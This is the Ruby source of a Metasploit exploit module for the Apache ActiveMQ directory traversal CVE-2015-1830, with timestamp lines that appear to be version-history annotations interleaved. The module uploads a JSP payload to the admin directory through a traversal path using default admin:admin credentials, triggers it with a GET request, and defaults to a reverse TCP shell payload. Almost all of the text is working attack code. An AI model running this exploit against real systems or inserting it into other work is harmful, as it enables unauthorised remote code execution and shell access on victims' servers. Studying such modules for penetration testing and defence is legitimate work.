2020-02-04 12:01:41 +02:00
##
2020-02-04 13:14:03 +02:00
# This module requires Metasploit: https://metasploit.com/download
2020-02-04 12:01:41 +02:00
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf :: Exploit :: Remote
2020-03-03 20:17:13 +02:00
Rank = ExcellentRanking
2020-02-04 12:01:41 +02:00
include Msf :: Exploit :: Remote :: HttpClient
def initialize ( info = { } )
2021-02-16 13:56:50 +00:00
super (
update_info (
info ,
'Name' = > 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload' ,
'Description' = > %q{
This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache
ActiveMQ 5.x before 5.11.2 for Windows.
2020-03-04 16:57:36 +02:00
2021-02-16 13:56:50 +00:00
The module tries to upload a JSP payload to the /admin directory via the traversal
path /fileserver/.. \ admin \ using an HTTP PUT request with the default ActiveMQ
credentials admin:admin (or other credentials provided by the user). It then issues
an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the
payload and obtain a shell.
} ,
2021-08-27 17:15:33 +01:00
'Author' = > [
'David Jorm' , # Discovery and exploit
'Erik Wynter' # @wyntererik - Metasploit
] ,
'References' = > [
[ 'CVE' , '2015-1830' ] ,
[ 'EDB' , '40857' ] ,
[ 'URL' , 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ]
] ,
2021-02-16 13:56:50 +00:00
'Privileged' = > false ,
'Platform' = > %w[ win ] ,
2021-08-27 17:15:33 +01:00
'Targets' = > [
2021-02-16 13:56:50 +00:00
[
2021-08-27 17:15:33 +01:00
'Windows Java' ,
{
'Arch' = > ARCH_JAVA ,
'Platform' = > 'win'
}
2021-02-16 13:56:50 +00:00
] ,
2021-08-27 17:15:33 +01:00
] ,
2021-02-16 13:56:50 +00:00
'DisclosureDate' = > '2015-08-19' ,
'License' = > MSF_LICENSE ,
'DefaultOptions' = > {
'RPORT' = > 8161 ,
'PAYLOAD' = > 'java/jsp_shell_reverse_tcp'
2020-03-03 20:17:13 +02:00
} ,
2023-02-10 18:04:31 +00:00
'DefaultTarget' = > 0 ,
'Notes' = > {
'Stability' = > [ CRASH_SAFE ] ,
'SideEffects' = > [ ARTIFACTS_ON_DISK , IOC_IN_LOGS ] ,
'Reliability' = > [ REPEATABLE_SESSION ]
}
2021-02-16 13:56:50 +00:00
)
)
2020-02-04 12:01:41 +02:00
register_options ( [
OptString . new ( 'TARGETURI' , [ true , 'The base path to the web application' , '/' ] ) ,
2021-02-16 13:56:50 +00:00
OptString . new ( 'PATH' , [ true , 'Traversal path' , '/fileserver/..\\admin\\' ] ) ,
2020-02-04 12:01:41 +02:00
OptString . new ( 'USERNAME' , [ true , 'Username to authenticate with' , 'admin' ] ) ,
OptString . new ( 'PASSWORD' , [ true , 'Password to authenticate with' , 'admin' ] )
] )
end
2020-03-03 20:17:13 +02:00
def check
2021-02-16 13:56:50 +00:00
print_status ( 'Running check...' )
testfile = Rex :: Text . rand_text_alpha ( 10 )
testcontent = Rex :: Text . rand_text_alpha ( 10 )
2020-02-04 12:01:41 +02:00
send_request_cgi ( {
2021-02-16 13:56:50 +00:00
'uri' = > normalize_uri ( target_uri . path , datastore [ 'PATH' ] , " #{ testfile } .jsp " ) ,
'headers' = > {
2020-02-04 12:01:41 +02:00
'Authorization' = > basic_auth ( datastore [ 'USERNAME' ] , datastore [ 'PASSWORD' ] )
2021-02-16 13:56:50 +00:00
} ,
'method' = > 'PUT' ,
'data' = > " <% out.println( \" #{ testcontent } \" );%> "
2020-02-04 12:01:41 +02:00
} )
res1 = send_request_cgi ( {
2021-02-16 13:56:50 +00:00
'uri' = > normalize_uri ( target_uri . path , " admin/ #{ testfile } .jsp " ) ,
'headers' = > {
2020-02-04 12:01:41 +02:00
'Authorization' = > basic_auth ( datastore [ 'USERNAME' ] , datastore [ 'PASSWORD' ] )
2021-02-16 13:56:50 +00:00
} ,
'method' = > 'GET'
2020-02-04 12:01:41 +02:00
} )
if res1 && res1 . body . include? ( testcontent )
send_request_cgi (
2021-02-24 20:24:57 +00:00
{
2021-02-16 13:56:50 +00:00
'uri' = > normalize_uri ( target_uri . path , " admin/ #{ testfile } .jsp " ) ,
'headers' = > {
2020-02-04 12:01:41 +02:00
'Authorization' = > basic_auth ( datastore [ 'USERNAME' ] , datastore [ 'PASSWORD' ] )
2021-02-16 13:56:50 +00:00
} ,
'method' = > 'DELETE'
2020-02-04 12:01:41 +02:00
} ,
2021-02-24 20:24:57 +00:00
1
2020-02-04 12:01:41 +02:00
)
return Exploit :: CheckCode :: Vulnerable
end
Exploit :: CheckCode :: Safe
end
def exploit
2021-02-16 13:56:50 +00:00
print_status ( 'Uploading payload...' )
testfile = Rex :: Text . rand_text_alpha ( 10 )
vprint_status ( " If upload succeeds, payload will be available at #{ target_uri . path } admin/ #{ testfile } .jsp " ) # This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails.
2020-02-04 12:01:41 +02:00
2020-03-03 20:17:13 +02:00
send_request_cgi ( {
2021-02-16 13:56:50 +00:00
'uri' = > normalize_uri ( target_uri . path , datastore [ 'PATH' ] , " #{ testfile } .jsp " ) ,
'headers' = > {
2020-02-04 12:01:41 +02:00
'Authorization' = > basic_auth ( datastore [ 'USERNAME' ] , datastore [ 'PASSWORD' ] )
2021-02-16 13:56:50 +00:00
} ,
'method' = > 'PUT' ,
'data' = > payload . encoded
2020-02-04 12:01:41 +02:00
} )
2020-02-04 13:14:03 +02:00
2021-02-16 13:56:50 +00:00
print_status ( 'Payload sent. Attempting to execute the payload.' )
2020-03-03 20:17:13 +02:00
res = send_request_cgi ( {
2021-02-16 13:56:50 +00:00
'uri' = > normalize_uri ( target_uri . path , " admin/ #{ testfile } .jsp " ) ,
'headers' = > {
2020-03-03 20:17:13 +02:00
'Authorization' = > basic_auth ( datastore [ 'USERNAME' ] , datastore [ 'PASSWORD' ] )
2020-02-04 12:01:41 +02:00
} ,
2021-02-16 13:56:50 +00:00
'method' = > 'GET'
2020-02-04 12:01:41 +02:00
} )
2020-03-03 20:17:13 +02:00
if res && res . code == 200
2021-02-16 13:56:50 +00:00
print_good ( 'Payload executed!' )
2020-02-04 12:01:41 +02:00
else
2021-02-16 13:56:50 +00:00
fail_with ( Failure :: PayloadFailed , 'Failed to execute the payload' )
2020-02-04 12:01:41 +02:00
end
end
2020-02-04 13:14:03 +02:00
end
